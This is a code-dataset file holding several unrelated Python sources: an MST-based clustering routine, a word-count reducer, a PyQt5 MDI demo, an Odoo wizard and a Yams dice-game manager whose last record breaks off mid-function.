+{"seq_id":"478602961","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import *\nfrom sys import maxsize as max_integer\n\neuclidean_distance = lambda data, point: np.sqrt(np.sum(np.power(data - point, 2), axis = 1).reshape((len(data), 1)))\n\n\ndef minimum_spanning_tree(data, k = 3, q = 2, f = 2):\n \n #debug:\n #plt.gca().set_aspect('equal', adjustable='box')\n \n #construct the complete Graph G\n N = len(data)\n G = np.empty((N, 0)) \n for point in data:\n G = np.concatenate((G, euclidean_distance(data,point)), axis=1)\n \n ######################\n \n MST = np.zeros(G.shape)\n \n N = len(G)\n \n key = np.zeros(N)\n key.fill(max_integer)\n parent = np.zeros(N)\n \n key[0] = 0\n parent[0] = -1\n \n visited = np.zeros(N)\n \n for i in range(N - 1): #edges\n \n current_value = np.min(key[np.where(visited == 0)]) #take the min key where visited = 0\n \n current_node = -1\n for i, element in enumerate(key):\n if element == current_value and visited[i] == 0:\n current_node = i \n break\n \n visited[current_node] = 1\n \n for adj_node in range(N): #all nodes are adjacent\n \n if G[current_node, adj_node] < key[adj_node] and visited[adj_node] == 0 and G[current_node][adj_node] !=0:\n key[adj_node] = G[current_node, adj_node]\n parent[adj_node] = current_node\n \n \n #fill in MST table\n x_list = []\n y_list = []\n for i, j in enumerate(zip(key[1:], parent[1:]), start = 1):\n MST[j[1], i] = j[0]\n x_list.append(j[1])\n y_list.append(i)\n MST[i, j[1]] = j[0]\n \n \n #debug: visualize MST\n '''\n x, y= np.nonzero(MST)\n for ole in zip(x, y): \n plt.plot((data[ole[0], 0], data[ole[1], 0]), (data[ole[0], 1], data[ole[1], 1]), color = 'm') \n #plt.show()\n '''\n \n ##########################\n \n \n \n inconsistent = np.zeros(N - 1) #follows x_list, y_list\n \n #find all pairs of nodes of edges\n for i, nodes in enumerate(zip(x_list, y_list)):\n weight = MST[nodes[0], nodes[1]]\n list_of_weights_N1 = np.empty((0, 0))\n list_of_weights_N2 = np.empty((0, 0))\n \n list_of_weights_N1 = _recursion_util(nodes, k, list_of_weights_N1, MST)\n list_of_weights_N2 = _recursion_util(nodes[::-1], k, list_of_weights_N2, MST)\n \n #inconsistency criterion\n weight_mean_N1 = np.mean(list_of_weights_N1)\n weight_mean_N2 = np.mean(list_of_weights_N2)\n weight_std_N1 = np.std(list_of_weights_N1)\n weight_std_N2 = np.std(list_of_weights_N2)\n \n if weight > max(q * weight_std_N1 + weight_mean_N1, q * weight_std_N2 + weight_mean_N2) and \\\n weight / max(weight_mean_N1, weight_mean_N2) > f: \n inconsistent[i] = 1 \n \n \n #debug: show in graph inconsistent edges\n for i, inc in enumerate(inconsistent):\n if inc == 1:\n plt.text((data[x_list[i],0] + data[y_list[i],0])/2, (data[x_list[i],1] + data[y_list[i],1])/2 , \"inc\")\n plt.plot((data[x_list[i],0], data[y_list[i], 0] ), (data[x_list[i],1], data[y_list[i], 1]))\n \n #debug: show in graph weights\n '''for ind, g in enumerate(MST):\n for oe, weight in enumerate(g):\n if weight !=0:\n plt.text((data[ind,0] + data[oe, 0])/2, (data[ind, 1] + data[oe, 1])/2 , round(weight,2), fontsize=7)\n '''\n \n ##########################\n\n data = np.hstack((data, np.zeros((len(data), 1))))\n \n #get the indices where inconsistent is not zero\n inc_edges_indices = np.nonzero(inconsistent)\n \n for index in inc_edges_indices[0]:\n MST[x_list[index], y_list[index]] =MST[y_list[index], x_list[index]] = 0\n \n visited_nodes = np.zeros(N)\n \n #dfs from now on\n cluster_id = 1\n for s in range(N):\n if(visited_nodes[s] == 0):\n visited_nodes[s] = 1\n data[s, 2] = cluster_id\n _dfs_util(MST, s, visited_nodes, cluster_id, data)\n cluster_id += 1\n \n return data\n\n \ndef _dfs_util(MST, s, visited_nodes, cluster_id, data):\n adj_nodes = np.nonzero(MST[s, :])\n for node in adj_nodes[0]:\n if visited_nodes[node] == 0:\n visited_nodes[node] = 1\n data[node, -1] = cluster_id\n _dfs_util(MST, node, visited_nodes, cluster_id, data)\n \n \ndef _recursion_util(nodes, k, list_of_weights, MST):\n \n if k == 0: return list_of_weights\n \n current_node1 = nodes[0]\n current_node2 = nodes[1]\n \n adj_nodes = np.nonzero(MST[current_node1, :])\n adj_nodes = np.delete(adj_nodes, np.where(adj_nodes[0] == current_node2))\n \n if len(adj_nodes) == 0: return list_of_weights\n \n for node in adj_nodes:\n k = k - 1\n list_of_weights = np.append(list_of_weights, MST[node, current_node1])\n list_of_weights = _recursion_util((node, current_node1),k, list_of_weights, MST)\n k += 1\n \n return list_of_weights \n \n\n","sub_path":"graph_theory/MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"449962500","text":"#!/usr/bin/env python3\n\nfrom itertools import groupby\nfrom operator import itemgetter\nimport collections\nimport sys\n\n\ndef read_mapper_output(file, separator='\\t'):\n\tfor line in file:\n\t\tyield line.rstrip().split(separator, 1)\n\ndef main(separator='\\t'):\n\tfrom collections import OrderedDict\n\tsortedDictionary = {}\n\t# input comes from STDIN (standard input)\n\tdata = read_mapper_output(sys.stdin, separator=separator)\n\t# groupby groups multiple word-count pairs by word,\n\t# and creates an iterator that returns consecutive keys and their group:\n\t# current_word - string containing a word (the key)\n\t# group - iterator yielding all [\"<current_word>\", \"<count>\"] items\n\tfor current_word, group in groupby(data, itemgetter(0)):\n\t\ttry:\n\t\t\ttotal_count = sum(int(count) for current_word, count in group)\n\t\t\tsortedDictionary[current_word] = total_count\n\t\t\t# print(current_word + separator + str(total_count))\n\t\texcept ValueError:\n\t\t# count was not a number, so silently discard this item\n\t\t\tpass\n\tsortedDictionary = OrderedDict(sorted(sortedDictionary.items(), key=lambda kv: kv[1], reverse=True))\n\t# count = 10\n\tfor key,val in sortedDictionary.items():\n\t\t# if count >= 1 & count <= 10:\n\t\tprint (key, val)\n\t\t# count = count-1\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"MR/part2/twitter/word co-occurence/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453292658","text":"import sys\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMdiArea, QMdiSubWindow, QTextEdit\n\n\nclass MainWin(QMainWindow):\n \"\"\"主窗口\"\"\"\n count = 0\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.setWindowTitle(\"QMdiArea QMdiSubWidow 使用\")\n\n self.mdi_area = QMdiArea()\n self.setCentralWidget(self.mdi_area)\n\n menu_bar = self.menuBar()\n menu_file = menu_bar.addMenu(\"文件\")\n action_new = menu_file.addAction(\"新建\")\n action_new.setData(\"new\")\n action_save = menu_file.addAction(\"保存\")\n action_save.setData(\"save\")\n action_cascade = menu_file.addAction(\"级联&Cascade\")\n action_cascade.setData(\"cascade\")\n action_tiled = menu_file.addAction(\"平铺&Tiled\")\n action_tiled.setData(\"tiled\")\n menu_file.triggered.connect(self.window_action)\n\n def window_action(self, action):\n print(\"点击\", action.data())\n if action.data() == \"new\":\n MainWin.count += 1\n sub_win = QMdiSubWindow()\n sub_win.setWidget(QTextEdit())\n sub_win.setWindowTitle(\"子窗口 %d\" % MainWin.count)\n self.mdi_area.addSubWindow(sub_win)\n if action.data() == \"csscade\":\n self.mdi_area.cascadeSubWindows() # 级联模式排列\n if action.data() == \"tiled\":\n self.mdi_area.tileSubWindows() # 平铺排列\n\n\nif __name__ == \"__main__\":\n\n app = QApplication(sys.argv)\n win = MainWin()\n win.show()\n sys.exit(app.exec())","sub_path":"03_高级界面控件/示例内容/07_QMidArea, QMidSubWindow.py","file_name":"07_QMidArea, QMidSubWindow.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"421963337","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass Wizard(models.TransientModel):\n _name = 'tsbd.wizard'\n name = fields.Char()\n res_model = fields.Char(default = lambda self: self._context.get('active_model'))\n log = fields.Text()\n \n @api.multi\n def save_avatar_player(self):\n players = self.env['tsbd.player'].search([('image_link', '!=', False)])\n for r in players:\n r.saved_image_view = r.image_view\n @api.multi\n def xoa_bxh_not_cated(self):\n not_cate_bxh = self.env['tsbd.bxh'].search([('cate_id','=',False)])\n not_cate_bxh.unlink()\n self.log = u'Đã xóa %s bxh'%(len(not_cate_bxh))\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n @api.multi\n def trig(self):\n if self.res_model =='tsbd.match':\n domain = [('state','=',u'Kết thúc')]\n else:\n domain = []\n not_cate_bxh = self.env[self.res_model].search(domain)\n not_cate_bxh.write({'trig':True})\n self.log = u'Đã trig %s Predict'%(len(not_cate_bxh))\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n def return_this(self):\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n @api.multi\n def xoa_bxh(self):\n cates = self.env['tsbd.cate'].search([('large_cate','=', True)])\n for c in cates:\n c.clear_bxh()\n self.log = u'Đã Clear BXH'\n return self.return_this()\n \n \n \n @api.multi\n def gen_bxh(self):\n cates = self.env['tsbd.cate'].search([('large_cate','=', True)])\n for c in cates:\n c.bxh()\n for c in cates:\n c.with_context(for_bet=True).bxh()\n self.log = u'Đã Gen BXH'\n return self.return_this()\n \n \n \n\n ","sub_path":"tsbd/wizard/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468775687","text":"import os\r\nimport random\r\n\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.webapp import template\r\n\r\nfrom model import Game, Player, Dice, Score, Language\r\n\r\nfrom tools import manager\r\n\r\nclass YamsManager(manager.Manager):\r\n \"\"\"\r\n \"\"\"\r\n\r\n def new_game(self, game_name):\r\n \"\"\"\r\n \"\"\"\r\n game_name = game_name.strip()\r\n if game_name == '':\r\n game_name = ' '\r\n\r\n game_query = Game().all()\r\n game_query.filter('name =', game_name)\r\n\r\n if game_query.count() > 0:\r\n return None\r\n\r\n #\r\n game = Game()\r\n game.name = game_name\r\n #\r\n game.put()\r\n\r\n return game\r\n\r\n def new_player(self, player_name):\r\n \"\"\"\r\n \"\"\"\r\n player_name = player_name.strip()\r\n if player_name == '':\r\n player_name = ' '\r\n\r\n player_query = Player().all()\r\n player_query.filter('name =', player_name)\r\n player_query.order('name')\r\n\r\n if player_query.count() > 0:\r\n return None\r\n\r\n #\r\n player = Player()\r\n player.name = player_name\r\n #\r\n player.put()\r\n\r\n return player.key()\r\n\r\n def player(self):\r\n \"\"\"\r\n \"\"\"\r\n # set the template for edit\r\n self.template_values['players'] = Player().all()\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'player.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def delete_player(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n try:\r\n player.score.delete()\r\n except:\r\n pass\r\n\r\n # dice deletion\r\n dice_query = Dice().all()\r\n dice_query.filter('player =', player)\r\n for dice in dice_query:\r\n dice.delete()\r\n\r\n player.delete()\r\n\r\n def init_score(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n player = Player().get(player_key)\r\n\r\n #\r\n score = Score()\r\n #\r\n score.one = -1\r\n score.two = -1\r\n score.three = -1\r\n score.four = -1\r\n score.five = -1\r\n score.six = -1\r\n #\r\n score.three_of_kind = -1\r\n score.four_of_kind = -1\r\n score.full = -1\r\n score.small_suite = -1\r\n score.big_suite = -1\r\n score.lucky = -1\r\n score.yams = -1\r\n #\r\n score.put()\r\n\r\n #\r\n player.score = score\r\n #\r\n player.put()\r\n\r\n def __init_dice(self, player, dice_name):\r\n \"\"\"\r\n \"\"\"\r\n query = Dice().all()\r\n query.filter('player =', player)\r\n query.filter('name =', dice_name)\r\n\r\n if query.count() > 0:\r\n for dice in query:\r\n dice.delete()\r\n\r\n dice = Dice()\r\n dice.player = player\r\n dice.name = dice_name\r\n dice.turn = 1\r\n dice.selected = False\r\n dice.value = random.randint(1, 6)\r\n dice.put()\r\n\r\n def init_dices(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n self.__init_dice(player, 'dice1')\r\n self.__init_dice(player, 'dice2')\r\n self.__init_dice(player, 'dice3')\r\n self.__init_dice(player, 'dice4')\r\n self.__init_dice(player, 'dice5')\r\n\r\n def create_game(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n # set the template for edit\r\n self.template_values['player_key'] = player_key\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'create_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def create(self, player_key, game_name):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n game = self.new_game(game_name)\r\n if game:\r\n #\r\n player = Player().get(player_key)\r\n player.game = game\r\n player.put()\r\n return True\r\n\r\n # game wasn't created\r\n return False\r\n\r\n def choose(self, player_key, game_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n game = Game().get(game_key)\r\n #\r\n player = Player().get(player_key)\r\n player.game = game\r\n player.put()\r\n\r\n def choose_game(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n player = Player().get(player_key)\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'choose_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def delete_game(self, game_key):\r\n \"\"\"\r\n \"\"\"\r\n # get the game to delete\r\n game = Game().get(game_key)\r\n\r\n # find the players\r\n player_query = Player().all()\r\n player_query.filter('game =', game)\r\n player_query.order('name')\r\n for player in player_query:\r\n # score delete\r\n player.score.delete()\r\n\r\n # dice deletion\r\n dice_query = Dice().all()\r\n dice_query.filter('player =', player)\r\n for dice in dice_query:\r\n dice.delete()\r\n\r\n # delete the current player\r\n player.delete()\r\n\r\n # delete the expected game\r\n game.delete()\r\n\r\n\r\n def roll(self, player_key, dice1,\r\n dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n # value to return\r\n new_turn = True\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice1')\r\n query.filter('player =', player)\r\n d1 = query.get()\r\n if d1.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice2')\r\n query.filter('player =', player)\r\n d2 = query.get()\r\n if d2.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice3')\r\n query.filter('player =', player)\r\n d3 = query.get()\r\n if d3.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice4')\r\n query.filter('player =', player)\r\n d4 = query.get()\r\n if d4.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice5')\r\n query.filter('player =', player)\r\n d5 = query.get()\r\n if d5.turn > 2:\r\n return False\r\n\r\n if not dice1 == '':\r\n turn = d1.turn + 1\r\n d1.turn = turn\r\n if turn > 2:\r\n d1.put()\r\n new_turn = False\r\n d1.value = random.randint(1, 6)\r\n d1.selected = False\r\n d1.put()\r\n\r\n if not dice2 == '':\r\n turn = d2.turn + 1\r\n d2.turn = turn\r\n if turn > 2:\r\n d2.put()\r\n new_turn = False\r\n d2.value = random.randint(1, 6)\r\n d2.selected = False\r\n d2.put()\r\n\r\n if not dice3 == '':\r\n turn = d3.turn + 1\r\n d3.turn = turn\r\n if turn > 2:\r\n d3.put()\r\n new_turn = False\r\n d3.value = random.randint(1, 6)\r\n d3.selected = False\r\n d3.put()\r\n\r\n if not dice4 == '':\r\n turn = d4.turn + 1\r\n d4.turn = turn\r\n if turn > 2:\r\n d4.put()\r\n new_turn = False\r\n d4.value = random.randint(1, 6)\r\n d4.selected = False\r\n d4.put()\r\n\r\n if not dice5 == '':\r\n turn = d5.turn + 1\r\n d5.turn = turn\r\n if turn > 2:\r\n d5.put()\r\n new_turn = False\r\n d5.value = random.randint(1, 6)\r\n d5.selected = False\r\n d5.put()\r\n\r\n return new_turn\r\n\r\n def get_number_item(self, name, value, dice1,\r\n dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n score = 0\r\n if dice1 == value:\r\n score += value\r\n\r\n if dice2 == value:\r\n score += value\r\n\r\n if dice3 == value:\r\n score += value\r\n\r\n if dice4 == value:\r\n score += value\r\n\r\n if dice5 == value:\r\n score += value\r\n\r\n return {\r\n 'name': name,\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n def one(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('one', 1,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'one',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def two(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('two', 2,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'two',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def three(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('three', 3,\r\n dice1, dice2, dice3, dice4, dice5)\r\n else:\r\n return {\r\n 'name': 'three',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def four(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('four', 4,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'four',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def five(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('five', 5,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'five',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def six(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('six', 6,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'six',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def same_of_kind(self, number_of_kind,\r\n dice1, dice2, dice3, dice4, dice5,\r\n different=None):\r\n \"\"\"\r\n \"\"\"\r\n found = dict()\r\n\r\n if not different == dice1:\r\n found[dice1] = 1\r\n\r\n if not different == dice2:\r\n if dice2 in found:\r\n nb = found[dice2]\r\n found[dice2] = nb + 1\r\n else:\r\n found[dice2] = 1\r\n\r\n if not different == dice3:\r\n if dice3 in found:\r\n nb = found[dice3]\r\n found[dice3] = nb + 1\r\n else:\r\n found[dice3] = 1\r\n\r\n if not different == dice4:\r\n if dice4 in found:\r\n nb = found[dice4]\r\n found[dice4] = nb + 1\r\n else:\r\n found[dice4] = 1\r\n\r\n if not different == dice5:\r\n if dice5 in found:\r\n nb = found[dice5]\r\n found[dice5] = nb + 1\r\n else:\r\n found[dice5] = 1\r\n\r\n for key in found.keys():\r\n if found[key] >= number_of_kind:\r\n return key\r\n\r\n return 0\r\n\r\n\r\n def three_of_kind(self, score, dice1, dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(3, dice1, dice2, dice3, dice4, dice5):\r\n score = 50\r\n\r\n return {\r\n 'name': '3_of_kind',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': '3_of_kind',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def four_of_kind(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(4, dice1, dice2, dice3, dice4, dice5):\r\n score = 75\r\n\r\n return {\r\n 'name': '4_of_kind',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': '4_of_kind',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def full(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n different = self.same_of_kind(2, dice1, dice2,\r\n dice3, dice4, dice5)\r\n if self.same_of_kind(3, dice1, dice2,\r\n dice3, dice4, dice5, different):\r\n score = 75\r\n\r\n return {\r\n 'name': 'full',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'full',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def check_suite(self, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n # sorting\r\n sorted_dices = [dice1]\r\n if not dice2 in sorted_dices:\r\n sorted_dices.append(dice2)\r\n if not dice3 in sorted_dices:\r\n sorted_dices.append(dice3)\r\n if not dice4 in sorted_dices:\r\n sorted_dices.append(dice4)\r\n if not dice5 in sorted_dices:\r\n sorted_dices.append(dice5)\r\n\r\n for i in range(len(sorted_dices)):\r\n for j in range(len(sorted_dices)):\r\n if sorted_dices[i] < sorted_dices[j]:\r\n temp = sorted_dices[i]\r\n sorted_dices[i] = sorted_dices[j]\r\n sorted_dices[j] = temp\r\n\r\n # avoid double\r\n sorted_dices_only = list()\r\n for d in sorted_dices:\r\n if not d in sorted_dices_only:\r\n sorted_dices_only.append(d)\r\n\r\n fail = 5\r\n if len(sorted_dices_only) == 5:\r\n dif = sorted_dices_only[4] - sorted_dices_only[0]\r\n if dif == 4:\r\n fail = 0\r\n\r\n dif1 = sorted_dices_only[4] - sorted_dices_only[1]\r\n dif2 = sorted_dices_only[3] - sorted_dices_only[0]\r\n if dif1 == 3 or dif2 == 3:\r\n fail = 1\r\n\r\n if len(sorted_dices_only) == 4:\r\n dif = sorted_dices_only[3] - sorted_dices_only[0]\r\n if dif == 3:\r\n fail = 1\r\n\r\n return fail\r\n\r\n def small_suite(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n fail = self.check_suite(dice1, dice2, dice3, dice4, dice5)\r\n if fail < 2:\r\n score = 50\r\n\r\n return {\r\n 'name': 's_suite',\r\n 'value': score,\r\n 'new': fail < 2,\r\n 'cancel': fail > 1\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 's_suite',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def big_suite(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n fail = self.check_suite(dice1, dice2, dice3, dice4, dice5)\r\n if fail == 0:\r\n score = 75\r\n\r\n return {\r\n 'name': 'b_suite',\r\n 'value': score,\r\n 'new': fail == 0,\r\n 'cancel': fail > 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'b_suite',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def lucky(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = dice1\r\n score += dice2\r\n score += dice3\r\n score += dice4\r\n score += dice5\r\n return {\r\n 'name': 'lucky',\r\n 'value': score,\r\n 'new': True,\r\n 'cancel': False\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'lucky',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def yams(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(5, dice1, dice2, dice3, dice4, dice5):\r\n score = 100\r\n\r\n return {\r\n 'name': 'yams',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n else:\r\n return {\r\n 'name': 'yams',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def total(self, name):\r\n return {\r\n 'name': name,\r\n 'value': '',\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def __get_dice_value(self, dice_str, player):\r\n \"\"\"\r\n \"\"\"\r\n query = Dice().all()\r\n query.filter('name =', dice_str)\r\n query.filter('player =', player)\r\n dice = query.get()\r\n\r\n if dice:\r\n return dice.value\r\n\r\n else:\r\n return 0\r\n\r\n def get_score(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n d1 = self.__get_dice_value('dice1', player)\r\n d2 = self.__get_dice_value('dice2', player)\r\n d3 = self.__get_dice_value('dice3', player)\r\n d4 = self.__get_dice_value('dice4', player)\r\n d5 = self.__get_dice_value('dice5', player)\r\n\r\n if player.score:\r\n return [\r\n self.one(player.score.one, d1, d2, d3, d4, d5),\r\n self.two(player.score.two, d1, d2, d3, d4, d5),\r\n self.three(player.score.three, d1, d2, d3, d4, d5),\r\n self.four(player.score.four, d1, d2, d3, d4, d5),\r\n self.five(player.score.five, d1, d2, d3, d4, d5),\r\n self.six(player.score.six, d1, d2, d3, d4, d5),\r\n self.total('total1'),\r\n self.three_of_kind(player.score.three_of_kind, d1, d2, d3, d4, d5),\r\n self.four_of_kind(player.score.four_of_kind, d1, d2, d3, d4, d5),\r\n self.full(player.score.full, d1, d2, d3, d4, d5),\r\n self.small_suite(player.score.small_suite, d1, d2, d3, d4, d5),\r\n self.big_suite(player.score.big_suite, d1, d2, d3, d4, d5),\r\n self.lucky(player.score.lucky, d1, d2, d3, d4, d5),\r\n self.yams(player.score.yams, d1, d2, d3, d4, d5),\r\n self.total('total2'),\r\n self.total('total_all'),\r\n ]\r\n else:\r\n return [0, 0, 0, 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, '', '',]\r\n\r\n\r\n def update_score(self, player_key, score_name, score_value):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n total_one = 0\r\n total_two = 0\r\n total_all = 0\r\n\r\n if score_name == 'one':\r\n player.score.one = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.one > -1:\r\n total_one += player.score.one\r\n\r\n\r\n if score_name == 'two':\r\n player.score.two = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.two > -1:\r\n total_one += player.score.two\r\n\r\n if score_name == 'three':\r\n player.score.three = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.three > -1:\r\n total_one += player.score.three\r\n\r\n if score_name == 'four':\r\n player.score.four = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.four > -1:\r\n total_one += player.score.four\r\n\r\n if score_name == 'five':\r\n player.score.five = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.five > -1:\r\n total_one += player.score.five\r\n\r\n if score_name == 'six':\r\n player.score.six = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.six > -1:\r\n total_one += player.score.six\r\n\r\n player.score.total_one = total_one\r\n\r\n if score_name == '3_of_kind':\r\n player.score.three_of_kind = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.three_of_kind > -1:\r\n total_two += player.score.three_of_kind\r\n\r\n if score_name == '4_of_kind':\r\n player.score.four_of_kind = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.four_of_kind > -1:\r\n total_two += player.score.four_of_kind\r\n\r\n if score_name == 'full':\r\n player.score.full = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.full > -1:\r\n total_two += player.score.full\r\n\r\n if score_name == 's_suite':\r\n player.score.small_suite = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.small_suite > -1:\r\n total_two += player.score.small_suite\r\n\r\n if score_name == 'b_suite':\r\n player.score.big_suite = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.big_suite > -1:\r\n total_two += player.score.big_suite\r\n\r\n if score_name == 'lucky':\r\n player.score.lucky = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.lucky > -1:\r\n total_two += player.score.lucky\r\n\r\n if score_name == 